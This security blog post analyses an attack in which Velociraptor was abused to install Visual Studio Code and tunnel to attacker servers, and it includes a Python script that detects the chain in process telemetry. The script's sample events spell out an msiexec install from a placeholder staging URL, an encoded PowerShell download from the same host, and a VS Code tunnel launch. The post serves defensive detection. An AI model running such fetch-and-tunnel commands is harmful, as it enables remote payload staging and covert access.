Tunnel-boring Raptor: When Velociraptor Digs for Attackers
- Javier Conejo del Cerro
- 3 days ago
- 2 min read

A recent incident highlights how legitimate forensic tools can be weaponized against defenders. Unknown attackers abused Velociraptor, an open-source endpoint monitoring and forensic tool, to install Visual Studio Code and use its tunneling feature to reach command-and-control (C2) servers. Using standard Windows utilities and staging via Cloudflare Workers, they turned trusted defensive software into an offensive foothold. Below, we break down the attack step by step.
Phase 1: Initial Access and Delivery
- Entry vector: Attackers relied on the Windows msiexec utility to download an MSI installer from a malicious Cloudflare Workers domain.
- Trojanized installer: The MSI was crafted to install Velociraptor, a legitimate forensic tool trusted by IT and security teams. Its use helped the attackers blend into routine monitoring and incident response activity.
- Staging infrastructure: Cloudflare Workers acted as the staging ground, not only for Velociraptor but for the additional payloads that followed, giving the operation both persistence and flexibility.
This phase demonstrates a “living-off-the-land” tactic: leveraging built-in utilities (msiexec) and open-source tools to avoid detection.
Phase 2: Execution and Tunneling
- Velociraptor deployment: Once installed, Velociraptor was used to connect to attacker-controlled domains hosted on Cloudflare Workers.
- Encoded PowerShell: The tool executed an encoded PowerShell command to silently fetch Visual Studio Code from the staging server.
- Tunneling mode enabled: Visual Studio Code was not used for development but launched with the tunnel option enabled, effectively transforming it into a remote access tool. This granted attackers both persistent remote access and remote code execution within the victim’s environment.
Here, we see the dual abuse of legitimate software—Velociraptor as the loader, Visual Studio Code as the tunneling channel.
Phase 3: Additional Payloads and Malicious Capabilities
- Extra tools staged: Attackers also deployed utilities like Radmin, providing further remote administration capabilities.
- Expanded scope: These tools enabled credential theft and data exfiltration, and laid the groundwork for ransomware operations.
- Living off trusted binaries: Because Velociraptor and Visual Studio Code are widely recognized as safe, their malicious use blended into normal administrative traffic, reducing the chances of triggering alarms.
This phase underscores how attackers escalate from foothold to full compromise, turning standard IT workflows into vehicles for intrusion.
Phase 4: The Malicious Objective
The combination of Velociraptor and Visual Studio Code tunneling created an environment where attackers could:
- Steal credentials from compromised hosts.
- Exfiltrate sensitive enterprise data.
- Remotely execute commands for reconnaissance or lateral movement.
- Prepare the environment for ransomware deployment, treating this tradecraft as a precursor to larger extortion campaigns.
What began as a subtle abuse of trusted software became a stepping stone toward potential large-scale disruption.
Measures to Fend Off the Raptor
Organizations can defend against these tactics by:
- Monitoring for unauthorized Velociraptor installations and unexpected forensic tool usage.
- Flagging unusual msiexec downloads and encoded PowerShell activity tied to external domains.
- Deploying EDR solutions to detect tunneling behaviors and anomalous process chains.
- Tracking Cloudflare Workers and staging domains associated with known campaigns.
- Securing immutable backups and treating anomalous use of forensic or monitoring tools as potential ransomware precursors.
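The detection points listed above (msiexec pulling an installer from a URL, encoded PowerShell that reaches out to an external domain, Visual Studio Code launched in tunnel mode, and a forensic agent spawning a shell) can be expressed as simple rules over process-creation telemetry. The following is an added example written for this post, not tooling from the incident or from the Velociraptor project: it models Sysmon-style events (parent image, image, command line) as plain objects, decodes the -EncodedCommand payload so the URL inside it can be inspected, and runs each rule over a handful of constructed sample events. The hostnames, domain names and install paths (including the Velociraptor install path) are assumptions used only to make the sample run.

```python
"""Triage Windows process-creation events for the chain described in the post.

Added example. Event fields mirror a simplified Sysmon Event ID 1
(ParentImage / Image / CommandLine); all sample values are constructed.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def rule_msiexec_remote_install(e: ProcEvent) -> bool:
    """msiexec asked to install a package straight from a URL."""
    return _basename(e.image) == "msiexec.exe" and URL_RE.search(e.command_line) is not None


def rule_encoded_powershell_fetch(e: ProcEvent) -> bool:
    """Encoded PowerShell whose decoded script references an external URL."""
    if _basename(e.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    decoded = decode_encoded_command(e.command_line)
    return decoded is not None and URL_RE.search(decoded) is not None


def rule_vscode_tunnel(e: ProcEvent) -> bool:
    """Visual Studio Code started with the tunnel subcommand."""
    return (_basename(e.image) in ("code.exe", "code-tunnel.exe")
            and re.search(r"\btunnel\b", e.command_line, re.IGNORECASE) is not None)


def rule_forensic_tool_spawns_shell(e: ProcEvent) -> bool:
    """A forensic agent (here Velociraptor) spawning an interactive shell."""
    return (_basename(e.parent_image) == "velociraptor.exe"
            and _basename(e.image) in ("powershell.exe", "pwsh.exe", "cmd.exe"))


RULES = {
    "msiexec_remote_install": rule_msiexec_remote_install,
    "encoded_powershell_fetch": rule_encoded_powershell_fetch,
    "vscode_tunnel": rule_vscode_tunnel,
    "forensic_tool_spawns_shell": rule_forensic_tool_spawns_shell,
}


def triage(events):
    """Return (host, rule_name, command_line) for every rule each event trips."""
    return [(e.host, name, e.command_line)
            for e in events for name, rule in RULES.items() if rule(e)]


# Constructed sample telemetry (assumed paths and placeholder domains, not real IoCs).
_ENCODED_FETCH = base64.b64encode(
    "Invoke-WebRequest https://staging.EXAMPLE.workers.dev/vscode.zip "
    "-OutFile C:\\ProgramData\\vscode.zip".encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://staging.EXAMPLE.workers.dev/velo.msi /qn"),
    ProcEvent("ws01", r"C:\Program Files\Velociraptor\Velociraptor.exe",  # assumed install path
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoP -W Hidden -enc {_ENCODED_FETCH}"),
    ProcEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\ProgramData\vscode\code.exe", "code.exe tunnel"),
    # Benign noise on a second host: local MSI install and a normal editor launch.
    ProcEvent("ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\jdoe\Downloads\7zip.msi /qn"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Users\jdoe\AppData\Local\Programs\Microsoft VS Code\Code.exe",
              "Code.exe --unity-launch"),
]

if __name__ == "__main__":
    for host, rule_name, cmd in triage(SAMPLE_EVENTS):
        print(f"{host}\t{rule_name}\t{cmd[:80]}")
```

Run stand-alone, the script flags the four suspicious events on ws01 (the encoded PowerShell trips two rules, because it is both encoded-with-URL and a child of the forensic agent) and nothing on ws02. Decoding the encoded command rather than matching on the flag alone is what keeps the rule from firing on the many legitimate scheduled tasks that use -EncodedCommand without touching the network.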
This incident shows how attackers weaponize the very tools defenders trust. By blending legitimate software into their arsenal, they challenge traditional detection methods and highlight the need for behavioral monitoring, vigilant EDR, and a zero-trust approach to all binaries—no matter how familiar they seem.